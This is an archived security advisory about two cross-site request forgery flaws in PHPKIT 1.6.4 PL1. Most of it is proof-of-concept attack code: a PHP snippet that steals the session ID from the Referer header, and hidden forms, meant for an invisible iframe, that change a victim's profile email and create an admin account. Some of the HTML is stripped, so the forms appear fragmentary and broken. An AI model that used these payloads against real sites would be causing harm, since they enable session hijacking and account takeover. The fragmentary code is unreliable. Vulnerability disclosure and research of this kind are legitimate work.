Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: PHP :: bx1668.htm

PHPKIT 1.6.4 PL1 2 XSRF Vulnerabilities



PHPKIT 1.6.4 PL1 2 XSRF Vulnerabilities
PHPKIT 1.6.4 PL1 2 XSRF Vulnerabilities



###################################################################
PHPKIT 1.6.4 PL1 2 XSRF Vulnerabilites founded by NBBN                                      
###################################################################

Vendor: http://www.phpkit.de/ 

PHPKIT sends in all link in the forum the sessionid via GET. So if an attacker 
send a link to a victim, for example in a private message, he have the 
sessionid if he filter the Referer:

*******************************************************************************************
                                                                                        
* 
*******************************************************************************************



::Vulnerabilites:

There are two vulnerabilities(there more XSRF, but the principle is the same)

1) Update User Profile XSRF (don't ask for current password)
2) Create an admin XSRF




1)
 profile updated. Better is to create a 
site an then this code in a invisible iframe*/

$ref = $_SERVER['HTTP_REFERER'];                       // Here is the referer
$sid = substr($ref,strpos($ref,'PHPKITSID=')+10,32);  
?>






action="http://localhost/xampp/phpkit/upload_files/include.php?path=userprofile&mode=edit" method="POST" name="form"> > value="email@provider.tld">
2) Create admin IMPORTENT: This works only if the admin was logged in the admincp before he click the link from the attacker.
action="http://localhost/xampp/phpkit/upload_files/pk/include.php?path=useredit&editid=new"> type="hidden" name="PHPKITSID" value= /> value="mail@mail.tld" >


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH